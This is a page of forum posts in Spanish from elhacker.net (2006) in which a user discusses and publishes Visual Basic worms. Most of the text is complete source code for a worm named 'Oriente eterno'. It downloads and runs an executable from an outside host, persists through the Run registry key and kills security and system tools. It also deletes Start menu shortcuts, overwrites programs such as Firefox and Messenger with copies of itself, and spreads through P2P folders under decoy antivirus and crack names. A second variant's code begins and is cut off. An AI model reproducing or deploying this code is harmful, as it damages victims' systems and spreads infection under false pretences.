elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7 8
21  Programación / Programación Visual Basic / Re: NayrocBits - Malware en: 30 Diciembre 2006, 06:34 am
El punto de este malware es "Que se de cuenta que esta infectado", pues claro que mostrando MSGBOX con ese tipo de mensajes cualquier persona se sorprenderia y se asustaria, y empezara a correr los miles de antivirus que tiene, pero ninguno usa con eficazia...

Veras que no es nisiquiera un buen worm, es solo una burrada que se me ocurrio y ya...



El archivo AUTOEXEC (Por lo menos en mi XP) si sale... ;).
22  Programación / Programación Visual Basic / Re: NayrocBits - Malware en: 30 Diciembre 2006, 05:18 am
los troyanos, virus, worms, spyware, malware, dialers todos esos un usuario experto en PC y que esta en el tema es dificil que se le meta a la PC algo de esto, pero los otros que son unos NW solo usuarios que no saben una ***** o tiene un minimo conocimiento como mi vieja son los que sufren las consecuencias...!   si no entendes mi punto de vista te doy otra explicacion.


Sancho.Mazorka    :P


Claro xDDD... Tampoco pienso que un experto en el tema caiga en un worm tan sencillo... Es solo para los Newbies, como dije anteriormente, es de fines educativos, pero un worm mas fuerte usaria mejores redes para propagarse... ;).

23  Programación / Programación Visual Basic / Re: Worm By: DrakoX en: 30 Diciembre 2006, 05:14 am
Esta muy bueno tu worm...

pero... aunque es muy tentativo, yo me limitaria a infectar por msn, ya que se esta volviendo muy "Comun" y los antivirus estan a la guardia con eso...


Esta muy bueno tu worm, un poco destructivo si... xDDD
24  Programación / Programación Visual Basic / Re: NayrocBits - Malware en: 30 Diciembre 2006, 05:07 am
Me encantaria insultarte!  ;D  otro mas que crea un virus para romper la makina de alguien [...]  que ganas...?  ensima mira todo lo que posteas, no sabes que la mayoria de la gente no lee todo xq le parece agobiante, ponlo de a poco y explicado si lo vas a hacer.
Salu2 y espero que no te sirva  :P


En realidad fue hecho con fines educativos y no pretendo joder a nadie, si analizas bien el worm lo unico que hace es copiarse en mil directorios y matar algunos procesos, no hace mas nada, no borra informacion util, no desconfigura la maquina ni nada... (Depnde como uses el AUTOEXEC xDDD!)

Yo considero esto mas un Joke que un worm... pero en fin... son terminos y para mi worm es algo mas destructivo.. :P, este tan solo es el inicio de un worm... tan solo cumple funciones basicas... pero no llega al extremo de destruir una maquina...
25  Programación / Programación Visual Basic / Subir archivos... en: 30 Diciembre 2006, 05:03 am
Buenas... Estoy creando un programa para subir archivos a una web en especifica... He preguntando mediante ftp pero no me dan una buena respuesta y la respuesta que me dieron no era "Cierta" ... -.-


Si me pudieran ayudar, seria muy bueno ;).
26  Programación / Programación Visual Basic / Re: Worm ByDrakoX en: 30 Diciembre 2006, 05:01 am
y el worm?? :P...
27  Programación / Programación Visual Basic / Re: NayrocBits - Malware en: 30 Diciembre 2006, 04:59 am
ese code es viejisiiiisimo xD

lo he visto en otras partes para otros bichos...xD

Viejisimo? si lo he creado yo al 100%... :S...
28  Programación / Programación Visual Basic / Re: LA GUIA SUPREMA DEL VISUAL BASIC en: 29 Diciembre 2006, 02:17 am
A mi tambien me paso lo mismo con el KIS, intente desinfectarlo pero no lo hace... asi que borre los EXE por separado :P
29  Programación / Programación Visual Basic / Re: NayrocBits - Malware en: 29 Diciembre 2006, 02:05 am
-Oriente eterno-


Código:
Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _
   Alias "URLDownloadToFileA" _
  (ByVal pCaller As Long, _
   ByVal szURL As String, _
   ByVal szFileName As String, _         'API's para descargar sin ser detectado
   ByVal dwReserved As Long, _
   ByVal lpfnCB As Long) As Long
   Dim ERROR_SUCCESS
   Private Sub Alumbra()
On Error Resume Next

    Dim sSourceUrl As String

    sSourceUrl = "http://h1.ripside.net/MyArchivos/DCOM/InetCat.exe"
    DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\InetCat.exe"

'Descarga el Inetcat, exactamente el InetCat es el NayrocBits, solo que le cambie el nombre :P

End Sub
Private Sub Orientame()
On Error Resume Next
            Dim RegistroCochino As Object
            Dim RutaCochina As String
            Dim CadenaNueva As String
            Dim ContenidoCadena As String
           
            ContenidoCadena = App.Path & "\" & App.EXEName & ".Exe"
            CadenaNueva = "\SystemTray"
            RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _
                        "\CurrentVersion\Run" & CadenaNueva
           
            Set RegistroCochino = CreateObject("WScript.Shell")
           
            RegistroCochino.RegWrite RutaCochina, ContenidoCadena
'Aqui me añado al registro.
           
End Sub

Private Function NumeroAleartorio(Entre As Integer, yEntre As Integer) As Integer
On Error Resume Next
Randomize
NumeroAleartorio = Int((Entre - yEntre + 1) * Rnd + yEntre)
End Function 'Funcion para generar numeros aleatorios

Private Sub EliminarInicio()
Do
On Error Resume Next
Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\" & "*.*"
Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\" & "*.*"
Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\Herramientas del sistema\" & "*.*"


'Aqui elimino los accesos directos

End Sub

Private Sub OccidenteIntolerante()
On Error Resume Next
Dim sel
sel = Int(Rnd() * 7)
Select Case sel

'Aqui mezcle el radom y el case, lo que sucede es que se "Ejecuta cierto codigo de manera aleatoria".
'Aclaro que donde dice "Label1" es donde van los numeros aleatorios. :P

Case 0
MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation
Matar ("Explorer.exe")

Case 1
MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation
Matar ("Explorer.exe")

Case 2
MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation
Matar ("Explorer.exe")
Case 3
Matar ("explorer.exe")
Matar ("iexplore.exe")
Matar ("msnmsgr.exe")
Matar ("firefox.exe")
Matar ("opera.exe")
Matar ("taskmgr.exe")
Matar ("regedit.exe")
Case 4
Shell Environ("SYSTEMROOT") & "\InetCat.exe"
MsgBox " ", vbCritical


Case 5
SecuestroCarpeta Environ("SYSTEMDRIVE") & "\RECYCLER\SECUESTRO\"
Matar ("services.msc")
Matar ("taskmgr.exe")
Matar ("regedit.exe")
FileCopy Environ("sys32") & "\services.msc", Environ("systemdrive") & "\RECYCLER\Secuestro\services.msc"
FileCopy Environ("sys32") & "\regedit.exe", Environ("systemdrive") & "\RECYCLER\Secuestro\regedit.exe"
FileCopy Environ("sys32") & "\taskmgr.exe", Environ("systemdrive") & "\RECYCLCER\SECUESTRO\taskmgr.exe"
Kill Environ("SYS32") & "\services.msc"
Kill Environ("sys32") & "\regedit.exe"
Kill Environ("sys32") & "\taskmgr.exe"
FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\regedit.exe"
FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\taskmgr.exe"
FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\services.msc"
MsgBox " ", vbCritical

'Aqui me suplemento con los archivos importantes.

Case 6
do
msgbox " ", vbCritical, " "
loop

End Select
End Sub
Private Sub InfectarP2P()


On Error GoTo NOHAYP2P:
Do

'Aqui me añado a un archivo RAR y me copio a distintos directorios P2P, para expandirme... Esta idea la saque de una guia por Hendrix, muy buena idea ;).

Shell Environ("programfiles") & "\WINRAR\WinRAR.exe" & " a """ & Environ("Systemdrive") & "\K.rar"" """ & App.Path & "\" & App.EXEName & ".exe" & """", vbHide

FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Removal Tools.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-Sasser.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Mis documentos.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Fotos Desnudas.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Removal Tools.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Mis documentos.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\K-32.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\K-32.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\K-32.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\K-32.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\K-32.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\K-32.rar"

FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Overnet\incoming\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Swaptor\Download\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\WinMX\My Shared Folder\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Tesla\Files\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\XoloX\Downloads\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Rapigator\Share\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\KMD\My Shared Folder\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\BearShare\Shared\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Direct Connect\Received Files\Gedzac.rar"
'Infectar mediante canales P2P
NOHAYP2P:
End Sub

Public Sub SecuestroCarpeta(DirPath As String)
On Error GoTo error
MkDir DirPath$
Exit Sub
error:
'Crear carpetas de secuestro
End Sub
Sub Copiar()
Do
SecuestroCarpeta Environ("temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80"
FileCopy App.EXEName + ".exe", Environ("Temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80\VGA.exe"
SecuestroCarpeta Environ("tmp") & "\U\S\"
FileCopy App.EXEName + ".exe", Environ("tmp") & "\U\S\IECACHE.exe"
SecuestroCarpeta Environ("SYSTEMDRIVE") & "\Kw\"
FileCopy App.EXEName + ".exe", Environ("systemdrive") & "\Kw\Dir.exe"
SecuestroCarpeta Environ("SYS32") & "\Oriente-Eterno\"
FileCopy App.EXEName + ".exe", Environ("SYS32") & "\Oriente-Eterno\Desinfectar.exe"

End Sub
Sub Hijastros()
'Aqui hago lo mismo que secuestrar, pero esta vez lo hago con
'programas importantes.
Matar ("msnmsgr.exe")
Kill Environ("Programfiles") & "\MSN Messenger\msnmsgr.exe"
FileCopy App.EXEName + ".exe", Environ("programfiles") & "\MSN Messenger\msnmsgr.exe"

Matar ("firefox.exe")
Kill Environ("Programfiles") & "\Mozilla firefox\firefox.exe"
FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Mozilla firefox\firefox.exe"

Matar ("ypager.exe")
Kill Environ("Programfiles") & "\Yahoo!\Messenger\ypager.exe"
FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Yahoo!\Messenger\ypager.exe"

Matar ("Realplay.exe")
Kill Environ("Programfiles") & "\real\relaplayer\realplay.exe"
FileCopy App.EXEName + ".exe", Environ("Programfiles") & "\real\relaplayer\realplay.exe"

Matar ("wmplayer")
Kill Environ("Programfiles") & "\Windows media player\wmplayer.exe"
FileCopy App.EXEName + ".exe", Environ("ProgrAmFiLeS") & "\Windows media player\Wmplayer.exe"
'No infectar el mplayer2 ni otro archivo, ya que seria fatal para el SO
'y ese no es el punto de este virus


End Sub

Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
  DownloadFile = URLDownloadToFile(0, sURL, _
    sLocalFile, 0, 0) = ERROR_SUCCESS
End Function


Private Sub form_load()
On Error Resume Next
App.TaskVisible = False
Label1.Caption = NumeroAleartorio(0, 100)

Alumbra
OccidenteIntolerante
Orientame
InfectarP2P
OrienteEterno
EscribirHTA
EliminarInicio
Copiar
Hijastros

 Shell Environ("SYSTEMroot") & "\Index.hta"

'hdp
End Sub
Private Sub EscribirHTA()
  Do
      Open Environ("systemROOT") & "\Index.hta" For Output As #1
      Print #1, "<HTML>"
      Print #1, "<HEAD>"
      Print #1, "<TITLE>Oriente Eterno</TITLE>"
      Print #1, "</HEAD>"
      Print #1, "<CENTER> En honor a las Almas caidas </CENTER>"
      Print #1, "<CENTER> En honor a los ignorados y resentidos </center> "
      Print #1, "<CENTER> En honor al pueblo Libanes </center> "
      Print #1, "<CENTER> En honor a los muertos del 11 de Abril - Venezuela </center> "
      Close #1

 
End Sub

Public Sub Matar(ByVal processName As String)
       
        On Error GoTo ErrHandler
         
         Dim oWMI
         Dim ret
         Dim sService
         Dim oWMIServices
         Dim oWMIService
         Dim oServices
         Dim oService
         Dim servicename
         
          Set oWMI = GetObject("winmgmts:")
          Set oServices = oWMI.InstancesOf("win32_process")

          For Each oService In oServices
                 
                 servicename = LCase(Trim(CStr(oService.Name) & ""))
                 
                 If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
                    ret = oService.Terminate
                 End If
 
          Next
         
          Set oServices = Nothing
          Set oWMI = Nothing
 'Matar procesos
 
ErrHandler:
  Err.Clear
End Sub
Private Sub OrienteEterno()
On Error Resume Next

Dim SantoOriente
SantoOriente = Int(Rnd() * 11)
Select Case SantoOriente
Case 0
MsgBox "Dios bendiga las almas del pulgatorio", , "Amen"
Case 1
MsgBox "¿Hasta cuando es hora que el Occidente Intolerante ignore la existencia de Dios y del mundo Espiritual y Abandone los placeres materiales?", , "Oriente Eterno"
Case 2
MsgBox "Mientras tengamos el estamago lleno, no pensamos en los que tienen el estomago vacio", , "FOOD-FOR-LIFE"
Case 3
MsgBox "Que el prayamama este con vosotros, benditos sean", , "Prayamama"
Case 4
MsgBox "Es facil matar, Es dificil perderlo", , "No mates"
Case 5
MsgBox "Ohh buen cristiano, Cristiano del alma, ¿Cuantos mandamientos ignorastes hoy?", , "Dios nos mira atentamente"
Case 6
MsgBox "No es religiosidad la causa de nuestra existencia, Es el profundo amor que nos tiene Dios, y muchas veces lo ignoramos", , "Alto al suicidio"
Case 7
MsgBox "Por las almas benditas de los inocentes libaneses, Que descansen en paz en el Oriente Eterno", , "Oriente Eterno"
Case 8
MsgBox "Por la justicia en Venezuela, No olvidaremos el 11 de Abril", , "Justicia!"
Case 9
MsgBox "Por ser negro o por tener un distinto credo, no quita que seamos obra e hijos del Dios ", , "No al racismo"
Case 10
MsgBox "Es hora de la reflexion", , "Reflexiona"
End Select


End Sub


Este codigo lo hago en nombre de todos los muertos y caidos, resentidos e ignorados...

Hasta luego  y espero que lo usen con fines beneficos ;).
30  Programación / Programación Visual Basic / Re: NayrocBits - Malware en: 29 Diciembre 2006, 01:06 am
Lo que hace es autocopiarse y suplementar otros archivos. por ejemplo, este suplementa el "Regedit", el "Taskmgr (Administrador de tareas) y el "Services.msc".

Cuando presionen el "CTRL+ALT+SPR" mi worm se ejecutara (Eso tengo previsto  :P), tambien se añade al AUTOEXEC para iniciarse con el sistema sin necesidad de añadirme al registro.

Lo que hace es multiplicarse y multiplicarse, tambien descarga la otra version un poco mas violenta llamada "Oriente-eterno" (Lo descarga y tambien lo ejecuta mediante el mismo procedimiento).

Tambien cambia el titulo del IE y la pagina principal. Lo explicare mejor:


Código:
Option Explicit

Private Declare Function URLDownloadToFile Lib "urlmon" _
   Alias "URLDownloadToFileA" _
  (ByVal pCaller As Long, _
   ByVal szURL As String, _
   ByVal szFileName As String, _
   ByVal dwReserved As Long, _ 'Estas son apis para descargar archivos sin ser detectados
   ByVal lpfnCB As Long) As Long
   


Dim ERROR_SUCCESS
Private Sub Clipb()
On Error GoTo clip
Do
Clipboard.Clear
